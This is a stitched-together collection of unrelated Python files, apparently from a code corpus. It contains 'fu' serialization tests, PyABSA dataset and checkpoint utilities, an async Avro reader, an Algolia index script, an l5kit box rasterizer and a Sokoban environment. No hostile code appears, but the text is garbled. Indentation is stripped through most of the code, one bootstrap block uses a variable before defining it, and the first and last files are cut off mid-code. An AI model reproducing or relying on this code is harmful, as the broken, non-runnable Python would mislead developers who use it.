f = operator.attrgetter('mine', 'two')
result = fu.package.pack(f)
id, cons, inst = extract_package(result)
_, items = cons[id]
_, args = [cons[id] for id in items][-1]
parameters = [cons[id] for id in args]
attributes = [name for _, name in parameters]
if attributes == ['mine', 'two']:
raise Success
@TestCase
def test_operator_attrgetter_2():
f = operator.attrgetter('this.is.a.deep', 'one.and.this.one.too')
result = fu.package.pack(f)
id, cons, inst = extract_package(result)
_, items = cons[id]
_, args = [cons[id] for id in items][-1]
parameters = [cons[id] for id in args]
attributes = [name for _, name in parameters]
if attributes == ['this.is.a.deep', 'one.and.this.one.too']:
raise Success
@TestCase
def test_operator_itemgetter_0():
x = {'mine': 5}
f = operator.itemgetter('mine')
g = fu.unpack(fu.pack(f))
if f(x) == g(x):
raise Success
@TestCase
def test_operator_itemgetter_1():
f = operator.itemgetter('mine', 'two')
result = fu.package.pack(f)
id, cons, inst = extract_package(result)
_, items = cons[id]
_, args = [cons[id] for id in items][-1]
parameters = [cons[id] for id in args]
attributes = [name for _, name in parameters]
if attributes == ['mine', 'two']:
raise Success
@TestCase
def test_operator_methodcaller_0():
class t(object):
@classmethod
def mine(cls, x):
return 2 * x
f = operator.methodcaller('mine', 3)
g = fu.unpack(fu.pack(f))
if f(t) == g(t):
raise Success
@TestCase
def test_operator_methodcaller_1():
class t(object):
@classmethod
def mine(cls, x):
return 2 * x
f = operator.methodcaller('mine', x=3)
g = fu.unpack(fu.pack(f))
if f(t) == g(t):
raise Success
@TestCase
def test_operator_methodcaller_2():
class t(object):
@classmethod
def mine(cls, x, **kwargs):
return 2 * x + kwargs.get('y')
f = operator.methodcaller('mine', 3, y=20)
g = fu.unpack(fu.pack(f))
if f(t) == g(t):
raise Success
@TestCase
def test_operator_methodcaller_3():
class t(object):
@classmethod
def mine(cls, x, **kwargs):
return 2 * x + kwargs.get('y')
f = operator.methodcaller('mine', x=3, y=20)
g = fu.unpack(fu.pack(f))
if f(t) == g(t):
raise Success
@TestCase
def test_operator_methodcaller_classmethod_0():
class t1(object):
def mine(self, x, y):
return 2 * x + y
class t2(object):
def mine(self, x, y):
return i1.mine(x, y)
i1, i2 = t1(), t2()
f = operator.methodcaller('mine', 20, 5)
g = fu.unpack(fu.pack(f))
if f(i1) == g(i2):
raise Success
@TestCase
def test_operator_methodcaller_classmethod_1():
class t1(object):
def mine(self, x, y):
return 2 * x + y
class t2(object):
def mine(self, x, y):
return i1.mine(x, y)
i1, i2 = t1(), t2()
f = operator.methodcaller('mine', 20, y=5)
g = fu.unpack(fu.pack(f))
if f(i1) == g(i2):
raise Success
@TestCase
def test_operator_methodcaller_classmethod_2():
class t1(object):
def mine(self, x, y):
return 2 * x + y
class t2(object):
def mine(self, x, y):
return i1.mine(x, y)
i1, i2 = t1(), t2()
f = operator.methodcaller('mine', x=20, y=5)
g = fu.unpack(fu.pack(f))
if f(i1) == g(i2):
raise Success
if __name__ == '__main__':
results = []
for t in TestCaseList:
results.append( t() )
if __name__ == 'bootstrap':
import importlib, fu
from fu import package
## figure out which type methods we need
st = package.stash()
n = st.store(package)
t1 = set()
t1.update(n for n, _ in st.cons_data.values())
t1.update(n for n, _ in st.inst_data.values())
print(len(t1))
    [st.store(fu.package.cache.byid(n)) for n in t1]
t2 = set()
t2.update(n for n, _ in st.cons_data.values())
t2.update(n for n, _ in st.inst_data.values())
print(len(t2))
print(sum(map(len, (fu.package.cache.registration.id, fu.package.cache.registration.type, fu.package.cache.registration.const))))
t = t2
mymethod = type(fu.function.new)
myfunc = type(fu.function.new.im_func)
## serialize the stash methods
stashed_up, stashed_fe = (getattr(st, attr).im_func.func_code for attr in ['unpack_references', 'fetch'])
res = stashed_up, stashed_fe, st.packed()
#marshal.dumps(res)
class mystash:
cons_data = {}
inst_data = {}
def fetch(self, identity, **attributes):
_, data = self.cons_data[identity]
cls, data = self.byid(_), self.unpack_references(data, **attributes)
instance = cls.u_constructor(data, **attributes)
self.fetch_cache[identity] = instance
_, data = self.inst_data[identity]
            cls, data = self.byid(_), self.unpack_references(data, **attributes)
_ = cls.u_instance(instance, data, **attributes)
if instance is not _:
raise AssertionError
return instance
mystash.unpack_references = myfunc(stashed_up, namespace)
mystash.fetch = myfunc(stashed_fe, namespace)
x = mystash()
x.cons_data, x.inst_data = st.packed()
## serialize the necessary type methods
classes = [(n, fu.package.cache.byid(n)) for n in t]
methods = [(n, (cls.__name__, cls.new.im_func.func_code, cls.getclass.im_func.func_code, cls.u_constructor.im_func.func_code, cls.u_instance.im_func.func_code)) for n, cls in classes]
marshal.dumps(methods)
## ensure that we can recreate all these type methods
result, namespace = {}, {}
namespace['thread'] = importlib.import_module('thread')
namespace['imp'] = importlib.import_module('imp')
namespace['_weakref'] = importlib.import_module('_weakref')
for n, (name, new, get, cons, inst) in methods:
objspace = {
'new' : myfunc(new, namespace),
'getclass' : myfunc(get, namespace),
'u_constructor' : myfunc(cons, namespace),
'u_instance' : myfunc(inst, namespace),
}
o = type(name, (object,), objspace)()
result[n] = namespace[name] = o
#for attr in ['func_closure', 'func_code', 'func_defaults', 'func_dict', 'func_doc', 'func_globals', 'func_name']:
#for n, (new, cons, inst) in methods:
# if any(x.func_closure is not None for x in [cons, inst]):
# raise Exception(n)
# if any(x.func_defaults is not None for x in [cons, inst]):
# raise Exception(n)
# if any(len(x.func_dict) != 0 for x in [cons, inst]):
# raise Exception(n)
# for attr in ['func_code', 'func_name']:
# print(n, attr, repr(getattr(cons, attr)))
# print(n, attr, repr(getattr(inst, attr)))
consdata = st.cons_data
instances = {}
for _, (t, v) in consdata.items():
result[t].u_constructor(v, globals=namespace)
|
the-stack_0_25286
|
# -*- coding: utf-8 -*-
# file: file_utils.py
# time: 2021/7/13 0020
# author: yangheng <[email protected]>
# github: https://github.com/yangheng95
# Copyright (C) 2021. All Rights Reserved.
import copy
import json
import os
import pickle
import urllib.request
import torch
from findfile import find_files, find_dir
from google_drive_downloader import GoogleDriveDownloader as gdd
from pyabsa.core.atepc.dataset_utils.atepc_utils import split_text
from termcolor import colored
from pyabsa import __version__
# convert atepc_datasets in this repo for inferring_tutorials
from pyabsa.functional.dataset import DatasetItem
from pyabsa.utils.pyabsa_utils import save_args
def generate_inference_set_for_apc(dataset_path):
if isinstance(dataset_path, DatasetItem):
dataset_path = dataset_path.dataset_name
elif not os.path.exists(dataset_path):
dataset_path = os.getcwd()
train_datasets = find_files(dataset_path, ['dataset', 'train', 'apc'], exclude_key='.inference')
test_datasets = find_files(dataset_path, ['dataset', 'test', 'apc'], exclude_key='.inference')
for file in train_datasets + test_datasets:
try:
fin = open(file, 'r', newline='\n', encoding='utf-8')
lines = fin.readlines()
fin.close()
path_to_save = file + '.inference'
fout = open(path_to_save, 'w', encoding='utf-8', newline='\n', errors='ignore')
for i in range(0, len(lines), 3):
sample = lines[i].strip().replace('$T$', '[ASP]{}[ASP]'.format(lines[i + 1].strip()))
fout.write(sample + ' !sent! ' + lines[i + 2].strip() + '\n')
fout.close()
except:
print('Unprocessed file:', file)
print('save in: {}'.format(path_to_save))
print('process finished')
def is_similar(s1, s2):
count = 0.0
for token in s1.split(' '):
if token in s2:
count += 1
if count / len(s1.split(' ')) >= 0.8 and count / len(s2.split(' ')) >= 0.8:
return True
else:
return False
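# Hedged illustration (the example sentences are assumptions): two sentences
# sharing at least 80% of their tokens are treated as variants of the same line.
def _example_is_similar():
    return is_similar('the food was great', 'the food was great !')   # expected True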
def assemble_aspects(fname):
fin = open(fname, 'r', encoding='utf-8', newline='\n', errors='ignore')
lines = fin.readlines()
fin.close()
for i in range(len(lines)):
if i % 3 == 0 or i % 3 == 1:
lines[i] = ' '.join(split_text(lines[i].strip())).replace('$ t $', '$T$')
else:
lines[i] = lines[i].strip()
def unify_same_samples(same_samples):
text = same_samples[0][0].replace('$T$', same_samples[0][1])
polarities = [-999] * len(text.split())
tags = ['O'] * len(text.split())
samples = []
for sample in same_samples:
# print(sample)
polarities_tmp = copy.deepcopy(polarities)
try:
asp_begin = (sample[0].split().index('$T$'))
asp_end = sample[0].split().index('$T$') + len(sample[1].split())
for i in range(asp_begin, asp_end):
polarities_tmp[i] = sample[2]
if i - sample[0].split().index('$T$') < 1:
tags[i] = 'B-ASP'
else:
tags[i] = 'I-ASP'
samples.append([text, tags, polarities_tmp])
except:
print('Ignore Error:', sample[0])
return samples
samples = []
aspects_in_one_sentence = []
for i in range(0, len(lines), 3):
        lines[i] = lines[i].replace('$T$', ' $T$ ').replace('  ', ' ')
if len(aspects_in_one_sentence) == 0:
aspects_in_one_sentence.append([lines[i], lines[i + 1], lines[i + 2]])
continue
if is_similar(aspects_in_one_sentence[-1][0], lines[i]):
aspects_in_one_sentence.append([lines[i], lines[i + 1], lines[i + 2]])
else:
samples.extend(unify_same_samples(aspects_in_one_sentence))
aspects_in_one_sentence = []
aspects_in_one_sentence.append([lines[i], lines[i + 1], lines[i + 2]])
samples.extend(unify_same_samples(aspects_in_one_sentence))
return samples
def split_aspects(sentence):
single_aspect_with_contex = []
aspect_num = len(sentence[1].split("|"))
aspects = sentence[1].split("|")
polarity = sentence[2].split("|")
pre_position = 0
aspect_context = sentence[0]
for i in range(aspect_num):
aspect_context = aspect_context.replace("$A$", aspects[i], 1)
single_aspect_with_contex.append(
(aspect_context[pre_position:aspect_context.find("$A$")], aspects[i], polarity[i]))
pre_position = aspect_context.find(aspects[i]) + len(aspects[i]) + 1
return single_aspect_with_contex
def convert_atepc(fname):
print('converting:', fname)
dist_fname = fname.replace('apc_datasets', 'atepc_datasets') + '.atepc'
lines = []
samples = assemble_aspects(fname)
for sample in samples:
for token_index in range(len(sample[1])):
token, label, polarity = sample[0].split()[token_index], sample[1][token_index], sample[2][token_index]
lines.append(token + " " + label + " " + str(polarity))
lines.append('\n')
    # Before writing, check whether the file exists; delete it if it does
if os.path.exists(dist_fname):
os.remove(dist_fname)
fout = open(dist_fname, 'w', encoding='utf8')
for line in lines:
fout.writelines((line + '\n').replace('\n\n', '\n'))
fout.close()
# Extract the aspects from the dataset
def convert_apc_set_to_atepc_set(path):
if isinstance(path, DatasetItem):
path = path.dataset_name
if not os.path.exists(path):
files = find_files(os.getcwd(), [path, 'dataset', 'apc'], exclude_key='.inference')
else:
files = find_files(path, '', exclude_key='infer')
    print('Found dataset files at {}:'.format(path))
for f in files:
print(f)
for target_file in files:
if not (target_file.endswith('.inference') or target_file.endswith('.atepc')):
try:
convert_atepc(target_file)
except:
                print('failed to process: {}'.format(target_file))
else:
print('Ignore ', target_file)
print('finished')
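# Hedged usage sketch (the dataset path is a hypothetical placeholder): convert
# every APC-format file found under a directory into the ATEPC token format.
def _example_convert_apc_to_atepc():
    convert_apc_set_to_atepc_set('./apc_datasets/SemEval/laptop14')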
# Extract the aspects from the dataset
def refactor_chinese_dataset(fname, train_fname, test_fname):
lines = []
samples = assemble_aspects(fname)
positive = 0
negative = 0
sum = 0
# refactor testset
for sample in samples[:int(len(samples) / 5)]:
for token_index in range(len(sample[1])):
            token, label, polarity = sample[0].split()[token_index], sample[1][token_index], sample[2][token_index]
            lines.append(token + " " + label + " " + str(polarity))
lines.append('\n')
if 1 in sample[2]:
positive += 1
else:
negative += 1
sum += 1
    print(test_fname + f" sum={sum} positive={positive} negative={negative}")
if os.path.exists(test_fname):
os.remove(test_fname)
fout = open(test_fname, 'w', encoding='utf8')
for line in lines:
fout.writelines((line + '\n').replace('\n\n', '\n'))
fout.close()
    lines = []  # reset the buffer so the train split does not repeat the test lines
    positive = 0
negative = 0
sum = 0
# refactor trainset
for sample in samples[int(len(samples) / 5):]:
for token_index in range(len(sample[1])):
tokens = sample[0].split()
            token, label, polarity = sample[0].split()[token_index], sample[1][token_index], sample[2][token_index]
            lines.append(token + " " + label + " " + str(polarity))
lines.append('\n')
if 1 in sample[2]:
positive += 1
else:
negative += 1
sum += 1
print(train_fname + f"sum={sum} positive={positive} negative={negative}")
if os.path.exists(train_fname):
os.remove(train_fname)
fout = open(train_fname, 'w', encoding='utf8')
for line in lines:
fout.writelines((line + '\n').replace('\n\n', '\n'))
fout.close()
def detect_error_in_dataset(dataset):
f = open(dataset, 'r', encoding='utf8')
lines = f.readlines()
for i in range(0, len(lines), 3):
# print(lines[i].replace('$T$', lines[i + 1].replace('\n', '')))
if i + 3 < len(lines):
if is_similar(lines[i], lines[i + 3]) and len((lines[i] + " " + lines[i + 1]).split()) != len(
(lines[i + 3] + " " + lines[i + 4]).split()):
print(lines[i].replace('$T$', lines[i + 1].replace('\n', '')))
print(lines[i + 3].replace('$T$', lines[i + 4].replace('\n', '')))
def save_model(opt, model, tokenizer, save_path):
if not opt.save_mode:
return
# Save a trained model, configuration and tokenizer
if hasattr(model, 'module') or hasattr(model, 'core'):
# print("save model from data-parallel!")
model_to_save = model.module
else:
# print("save a single cuda model!")
model_to_save = model
if opt.save_mode == 1 or opt.save_mode == 2:
if not os.path.exists(save_path):
os.makedirs(save_path)
f_config = open(save_path + opt.model_name + '.config', mode='wb')
f_tokenizer = open(save_path + opt.model_name + '.tokenizer', mode='wb')
pickle.dump(opt, f_config)
pickle.dump(tokenizer, f_tokenizer)
f_config.close()
f_tokenizer.close()
save_args(opt, save_path + opt.model_name + '.args.txt')
if opt.save_mode == 1:
torch.save(model_to_save.state_dict(), save_path + opt.model_name + '.state_dict') # save the state dict
elif opt.save_mode == 2:
torch.save(model.cpu(), save_path + opt.model_name + '.model') # save the state dict
elif opt.save_mode == 3:
# save the fine-tuned bert model
model_output_dir = save_path + '-fine-tuned-bert'
if not os.path.exists(model_output_dir):
os.makedirs(model_output_dir)
output_model_file = os.path.join(model_output_dir, 'pytorch_model.bin')
output_config_file = os.path.join(model_output_dir, 'bert_config.json')
torch.save(model_to_save.state_dict(), output_model_file)
model_to_save.config.to_json_file(output_config_file)
tokenizer.save_vocabulary(model_output_dir)
else:
raise ValueError('Invalid save_mode: {}'.format(opt.save_mode))
model.to(opt.device)
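# Hedged sketch of the expected call site (the checkpoint path is an assumption):
# `opt` carries save_mode, model_name and device, and `save_path` is a
# directory-style prefix ending in a separator.
def _example_save_checkpoint(opt, model, tokenizer):
    save_model(opt, model, tokenizer, save_path='checkpoints/{}/'.format(opt.model_name))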
def check_update_log():
try:
if os.path.exists('./release_note.json'):
os.remove('./release_note.json')
gdd.download_file_from_google_drive('1nOppewL8L1mGy9i6HQnJrEWrfaqQhC_2', './release-note.json')
update_logs = json.load(open('release-note.json'))
for v in update_logs:
if v > __version__:
print(colored('*' * 20 + ' Release Note of Version {} '.format(v) + '*' * 20, 'green'))
for i, line in enumerate(update_logs[v]):
print('{}.\t{}'.format(i + 1, update_logs[v][line]))
except Exception as e:
print(colored('Fail to load release note: {}, you can check it on https://github.com/yangheng95/PyABSA/blob/release/release-note.json'.format(e), 'red'))
def check_dataset(dataset_path='./integrated_datasets', retry_count=3): # retry_count is for unstable conn to GitHub
try:
local_version = open(os.path.join(dataset_path, '__init__.py')).read().split('\'')[-2]
if retry_count:
def query_datasets():
dataset_url = 'https://raw.githubusercontent.com/yangheng95/ABSADatasets/master/datasets/__init__.py'
content = urllib.request.urlopen(dataset_url, timeout=int(5 / retry_count))
version = content.read().decode("utf-8").split('\'')[-2]
return version
try:
result = query_datasets() > local_version
if result:
print(colored('There is a new version of ABSADatasets, please remove the downloaded datasets to automatically download the new version.', 'green'))
except Exception:
retry_count -= 1
                check_dataset(dataset_path, retry_count=retry_count)
except Exception as e:
if find_dir('integrated_datasets'):
print(colored('ABSADatasets version check failed, please check the latest datasets on GitHub manually.', 'red'))
|
the-stack_0_25287
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
"""Read/Write Avro File Object Containers."""
import logging
import sys
from ..avro import avro_io_async
from ..avro import schema
from .datafile import DataFileException
from .datafile import MAGIC, SYNC_SIZE, META_SCHEMA, SCHEMA_KEY
PY3 = sys.version_info[0] == 3
logger = logging.getLogger(__name__)
# ------------------------------------------------------------------------------
# Constants
# Codecs supported by container files:
VALID_CODECS = frozenset(['null'])
class AsyncDataFileReader(object):
"""Read files written by DataFileWriter."""
def __init__(self, reader, datum_reader, **kwargs):
"""Initializes a new data file reader.
Args:
reader: Open file to read from.
datum_reader: Avro datum reader.
"""
self._reader = reader
self._raw_decoder = avro_io_async.AsyncBinaryDecoder(reader)
self._header_reader = kwargs.pop('header_reader', None)
self._header_decoder = None if self._header_reader is None else \
avro_io_async.AsyncBinaryDecoder(self._header_reader)
self._datum_decoder = None # Maybe reset at every block.
self._datum_reader = datum_reader
self.codec = "null"
self._block_count = 0
self._meta = None
self._sync_marker = None
async def init(self):
        # In case self._reader only has partial content (without header),
        # seek(0, 0) to make sure we read the (partial) content from the beginning.
await self._reader.seek(0, 0)
# read the header: magic, meta, sync
await self._read_header()
# ensure codec is valid
avro_codec_raw = self.get_meta('avro.codec')
if avro_codec_raw is None:
self.codec = "null"
else:
self.codec = avro_codec_raw.decode('utf-8')
if self.codec not in VALID_CODECS:
raise DataFileException('Unknown codec: %s.' % self.codec)
# get ready to read
self._block_count = 0
        # header_reader indicates the reader only has partial content. The reader doesn't have a block header,
        # so we use the block count stored last time.
        # Also ChangeFeed only has codec==null, so using _raw_decoder is fine.
if self._header_reader is not None:
self._block_count = self._reader.block_count
self._datum_decoder = self._raw_decoder
self.datum_reader.writer_schema = (
schema.parse(self.get_meta(SCHEMA_KEY).decode('utf-8')))
return self
async def __aenter__(self):
return self
async def __aexit__(self, data_type, value, traceback):
# Perform a close if there's no exception
if data_type is None:
self.close()
def __aiter__(self):
return self
# read-only properties
@property
def reader(self):
return self._reader
@property
def raw_decoder(self):
return self._raw_decoder
@property
def datum_decoder(self):
return self._datum_decoder
@property
def datum_reader(self):
return self._datum_reader
@property
def sync_marker(self):
return self._sync_marker
@property
def meta(self):
return self._meta
# read/write properties
@property
def block_count(self):
return self._block_count
def get_meta(self, key):
"""Reports the value of a given metadata key.
Args:
key: Metadata key (string) to report the value of.
Returns:
Value associated to the metadata key, as bytes.
"""
return self._meta.get(key)
async def _read_header(self):
header_reader = self._header_reader if self._header_reader else self._reader
header_decoder = self._header_decoder if self._header_decoder else self._raw_decoder
# seek to the beginning of the file to get magic block
await header_reader.seek(0, 0)
# read header into a dict
header = await self.datum_reader.read_data(META_SCHEMA, header_decoder)
# check magic number
if header.get('magic') != MAGIC:
fail_msg = "Not an Avro data file: %s doesn't match %s." \
% (header.get('magic'), MAGIC)
raise schema.AvroException(fail_msg)
# set metadata
self._meta = header['meta']
# set sync marker
self._sync_marker = header['sync']
async def _read_block_header(self):
self._block_count = await self.raw_decoder.read_long()
if self.codec == "null":
# Skip a long; we don't need to use the length.
await self.raw_decoder.skip_long()
self._datum_decoder = self._raw_decoder
else:
raise DataFileException("Unknown codec: %r" % self.codec)
async def _skip_sync(self):
"""
Read the length of the sync marker; if it matches the sync marker,
return True. Otherwise, seek back to where we started and return False.
"""
proposed_sync_marker = await self.reader.read(SYNC_SIZE)
if SYNC_SIZE > 0 and not proposed_sync_marker:
raise StopAsyncIteration
if proposed_sync_marker != self.sync_marker:
await self.reader.seek(-SYNC_SIZE, 1)
async def __anext__(self):
"""Return the next datum in the file."""
if self.block_count == 0:
await self._skip_sync()
await self._read_block_header()
datum = await self.datum_reader.read(self.datum_decoder)
self._block_count -= 1
        # event_position and block_count support resuming reads from the current position,
        # so there is no need to download the avro file from the beginning again.
if hasattr(self._reader, 'event_position'):
self.reader.block_count = self.block_count
await self.reader.track_event_position()
return datum
def close(self):
"""Close this reader."""
self.reader.close()
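# Hedged usage sketch (the stream and datum_reader objects are assumptions
# supplied by the caller): initialize the reader, then iterate its datums.
async def _example_read_all(stream, datum_reader):
    reader = await AsyncDataFileReader(stream, datum_reader).init()
    return [datum async for datum in reader]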
if __name__ == '__main__':
raise Exception('Not a standalone module')
|
the-stack_0_25289
|
#!/usr/bin/python
import os
from algoliasearch import algoliasearch
from parser import getDataFromUrlInFile, getDataSingleObject
client = algoliasearch.Client(
os.environ["APPID_ALGOLIA"], os.environ["APIKEY_ALGOLIA"])
index = client.init_index(os.environ["INDEX_ALGOLIA"])
def cleanBeforeFilling():
try:
ids = []
res = index.browse_all({"query": ""})
for hit in res:
ids.append(hit["objectID"])
index.delete_objects(ids)
return "done"
except Exception as e:
return str(e)
def pushNewIndexs():
try:
getDataFromUrlInFile(
"https://raw.githubusercontent.com/sindresorhus/awesome/master/readme.md")
file = open("readme.md", "r")
res = getDataSingleObject(file)
index.add_objects(res)
file.close()
return "done"
except Exception as e:
return str(e)
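# Hedged usage sketch: a full refresh clears the index and re-pushes the freshly
# parsed entries. Requires the Algolia environment variables used above.
if __name__ == '__main__':
    print(cleanBeforeFilling())
    print(pushNewIndexs())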
|
the-stack_0_25291
|
from typing import List, Optional, Tuple, Union
import cv2
import numpy as np
from l5kit.data.zarr_dataset import AGENT_DTYPE
from ..data.filter import filter_agents_by_labels, filter_agents_by_track_id
from ..geometry import rotation33_as_yaw, transform_points
from ..geometry.transform import yaw_as_rotation33
from .rasterizer import EGO_EXTENT_HEIGHT, EGO_EXTENT_LENGTH, EGO_EXTENT_WIDTH, Rasterizer
from .render_context import RenderContext
from .semantic_rasterizer import CV2_SHIFT, cv2_subpixel
def get_ego_as_agent(frame: np.ndarray) -> np.ndarray: # TODO this can be useful to have around
"""
Get a valid agent with information from the frame AV. Ford Fusion extent is used
Args:
frame (np.ndarray): the frame we're interested in
Returns: an agent np.ndarray of the AV
"""
ego_agent = np.zeros(1, dtype=AGENT_DTYPE)
ego_agent[0]["centroid"] = frame["ego_translation"][:2]
ego_agent[0]["yaw"] = rotation33_as_yaw(frame["ego_rotation"])
ego_agent[0]["extent"] = np.asarray((EGO_EXTENT_LENGTH, EGO_EXTENT_WIDTH, EGO_EXTENT_HEIGHT))
return ego_agent
def draw_boxes(
raster_size: Tuple[int, int],
raster_from_world: np.ndarray,
agents: np.ndarray,
color: Union[int, Tuple[int, int, int]],
) -> np.ndarray:
"""
Draw multiple boxes in one sweep over the image.
Boxes corners are extracted from agents, and the coordinates are projected in the image plane.
Finally, cv2 draws the boxes.
Args:
raster_size (Tuple[int, int]): Desired output image size
        raster_from_world (np.ndarray): 3x3 matrix to convert from world coordinates to raster (image) coordinates
agents (np.ndarray): array of agents to be drawn
color (Union[int, Tuple[int, int, int]]): single int or RGB color
Returns:
np.ndarray: the image with agents rendered. RGB if color RGB, otherwise GRAY
"""
if isinstance(color, int):
im = np.zeros((raster_size[1], raster_size[0]), dtype=np.uint8)
else:
im = np.zeros((raster_size[1], raster_size[0], 3), dtype=np.uint8)
box_world_coords = np.zeros((len(agents), 4, 2))
corners_base_coords = np.asarray([[-1, -1], [-1, 1], [1, 1], [1, -1]])
# compute the corner in world-space (start in origin, rotate and then translate)
for idx, agent in enumerate(agents):
corners = corners_base_coords * agent["extent"][:2] / 2 # corners in zero
r_m = yaw_as_rotation33(agent["yaw"])
box_world_coords[idx] = transform_points(corners, r_m) + agent["centroid"][:2]
box_raster_coords = transform_points(box_world_coords.reshape((-1, 2)), raster_from_world)
# fillPoly wants polys in a sequence with points inside as (x,y)
box_raster_coords = cv2_subpixel(box_raster_coords.reshape((-1, 4, 2)))
cv2.fillPoly(im, box_raster_coords, color=color, lineType=cv2.LINE_AA, shift=CV2_SHIFT)
return im
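# Hedged sketch (all values are illustrative assumptions): rasterize a single
# synthetic agent using an identity raster_from_world matrix.
def _example_draw_single_box():
    agent = np.zeros(1, dtype=AGENT_DTYPE)
    agent[0]["centroid"] = (10.0, 5.0)
    agent[0]["yaw"] = 0.5
    agent[0]["extent"] = (4.5, 2.0, 1.6)
    return draw_boxes((224, 224), np.eye(3), agent, color=255)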
class BoxRasterizer(Rasterizer):
def __init__(
self, render_context: RenderContext, filter_agents_threshold: float, history_num_frames: int,
):
"""
Args:
render_context (RenderContext): Render context
filter_agents_threshold (float): Value between 0 and 1 used to filter uncertain agent detections
history_num_frames (int): Number of frames to rasterise in the past
"""
super(BoxRasterizer, self).__init__()
self.render_context = render_context
self.raster_size = render_context.raster_size_px
self.filter_agents_threshold = filter_agents_threshold
self.history_num_frames = history_num_frames
def rasterize(
self,
history_frames: np.ndarray,
history_agents: List[np.ndarray],
history_tl_faces: List[np.ndarray],
agent: Optional[np.ndarray] = None,
) -> np.ndarray:
        # all frames are drawn relative to this one
frame = history_frames[0]
if agent is None:
ego_translation_m = history_frames[0]["ego_translation"]
ego_yaw_rad = rotation33_as_yaw(frame["ego_rotation"])
else:
ego_translation_m = np.append(agent["centroid"], history_frames[0]["ego_translation"][-1])
ego_yaw_rad = agent["yaw"]
raster_from_world = self.render_context.raster_from_world(ego_translation_m, ego_yaw_rad)
# this ensures we always end up with fixed size arrays, +1 is because current time is also in the history
out_shape = (self.raster_size[1], self.raster_size[0], self.history_num_frames + 1)
agents_images = np.zeros(out_shape, dtype=np.uint8)
ego_images = np.zeros(out_shape, dtype=np.uint8)
for i, (frame, agents) in enumerate(zip(history_frames, history_agents)):
agents = filter_agents_by_labels(agents, self.filter_agents_threshold)
# note the cast is for legacy support of dataset before April 2020
av_agent = get_ego_as_agent(frame).astype(agents.dtype)
if agent is None:
agents_image = draw_boxes(self.raster_size, raster_from_world, agents, 255)
ego_image = draw_boxes(self.raster_size, raster_from_world, av_agent, 255)
else:
agent_ego = filter_agents_by_track_id(agents, agent["track_id"])
if len(agent_ego) == 0: # agent not in this history frame
agents_image = draw_boxes(self.raster_size, raster_from_world, np.append(agents, av_agent), 255)
ego_image = np.zeros_like(agents_image)
else: # add av to agents and remove the agent from agents
agents = agents[agents != agent_ego[0]]
agents_image = draw_boxes(self.raster_size, raster_from_world, np.append(agents, av_agent), 255)
ego_image = draw_boxes(self.raster_size, raster_from_world, agent_ego, 255)
agents_images[..., i] = agents_image
ego_images[..., i] = ego_image
# combine such that the image consists of [agent_t, agent_t-1, agent_t-2, ego_t, ego_t-1, ego_t-2]
out_im = np.concatenate((agents_images, ego_images), -1)
return out_im.astype(np.float32) / 255
def to_rgb(self, in_im: np.ndarray, **kwargs: dict) -> np.ndarray:
"""
get an rgb image where agents further in the past have faded colors
Args:
in_im: the output of the rasterize function
kwargs: this can be used for additional customization (such as colors)
Returns: an RGB image with agents and ego coloured with fading colors
"""
hist_frames = in_im.shape[-1] // 2
in_im = np.transpose(in_im, (2, 0, 1))
# this is similar to the draw history code
out_im_agent = np.zeros((self.raster_size[1], self.raster_size[0], 3), dtype=np.float32)
agent_chs = in_im[:hist_frames][::-1] # reverse to start from the furthest one
agent_color = (0, 0, 1) if "agent_color" not in kwargs else kwargs["agent_color"]
for ch in agent_chs:
out_im_agent *= 0.85 # magic fading constant for the past
out_im_agent[ch > 0] = agent_color
out_im_ego = np.zeros((self.raster_size[1], self.raster_size[0], 3), dtype=np.float32)
ego_chs = in_im[hist_frames:][::-1]
ego_color = (0, 1, 0) if "ego_color" not in kwargs else kwargs["ego_color"]
for ch in ego_chs:
out_im_ego *= 0.85
out_im_ego[ch > 0] = ego_color
out_im = (np.clip(out_im_agent + out_im_ego, 0, 1) * 255).astype(np.uint8)
return out_im
|
the-stack_0_25292
|
from .sokoban_env import SokobanEnv, CHANGE_COORDINATES
from gym.spaces import Box
from gym.spaces.discrete import Discrete
class PushAndPullSokobanEnv(SokobanEnv):
def __init__(self,
dim_room=(10, 10),
max_steps=120,
num_boxes=3,
num_gen_steps=None,
**kwargs):
super(PushAndPullSokobanEnv, self).__init__(
dim_room=dim_room,
max_steps=max_steps,
num_boxes=num_boxes,
num_gen_steps=num_gen_steps)
# screen_height, screen_width = (dim_room[0] * 16, dim_room[1] * 16)
# self.observation_space = Box(low=0, high=255, shape=(screen_height, screen_width, 3))
# self.boxes_are_on_target = [False] * num_boxes
self.action_space = Discrete(len(self.get_action_lookup()))
_ = self.reset()
def step(self, action, observation_mode='rgb_array'):
assert action in ACTION_LOOKUP
self.num_env_steps += 1
self.new_box_position = None
self.old_box_position = None
moved_box = False
        if action == 0:
            moved_player = False
        # All push actions are in the range of [1, 4]
        elif action < 5:
moved_player, moved_box = self._push(action)
elif action < 9:
moved_player = self._move(action)
else:
moved_player, moved_box = self._pull(action)
self._calc_reward()
done = self._check_if_done()
# Convert the observation to RGB frame
observation = self.render(mode=observation_mode)
info = {
"action.name": ACTION_LOOKUP[action],
"action.moved_player": moved_player,
"action.moved_box": moved_box,
}
if done:
info["maxsteps_used"] = self._check_if_maxsteps()
info["all_boxes_on_target"] = self._check_if_all_boxes_on_target()
return observation, self.reward_last, done, info
def _pull(self, action):
"""
        Moves the player to the next field if it is not occupied, pulling along
        the box directly behind the player when one is present.
        :param action:
        :return: (moved_player, moved_box) booleans indicating changes to the room's state
"""
change = CHANGE_COORDINATES[(action - 1) % 4]
new_position = self.player_position + change
current_position = self.player_position.copy()
pull_content_position = self.player_position - change
# Move player if the field in the moving direction is either
# an empty field or an empty box target.
if self.room_state[new_position[0], new_position[1]] in [1, 2]:
self.player_position = new_position
self.room_state[(new_position[0], new_position[1])] = 5
self.room_state[current_position[0], current_position[1]] = \
self.room_fixed[current_position[0], current_position[1]]
box_next_to_player = self.room_state[pull_content_position[0], pull_content_position[1]] in [3, 4]
if box_next_to_player:
# Move Box
box_type = 4
if self.room_fixed[current_position[0], current_position[1]] == 2:
box_type = 3
self.room_state[current_position[0], current_position[1]] = box_type
self.room_state[pull_content_position[0], pull_content_position[1]] = \
self.room_fixed[pull_content_position[0], pull_content_position[1]]
return True, box_next_to_player
return False, False
def get_action_lookup(self):
return ACTION_LOOKUP
def get_action_meanings(self):
return ACTION_LOOKUP
ACTION_LOOKUP = {
0: 'no operation',
1: 'push up',
2: 'push down',
3: 'push left',
4: 'push right',
5: 'move up',
6: 'move down',
7: 'move left',
8: 'move right',
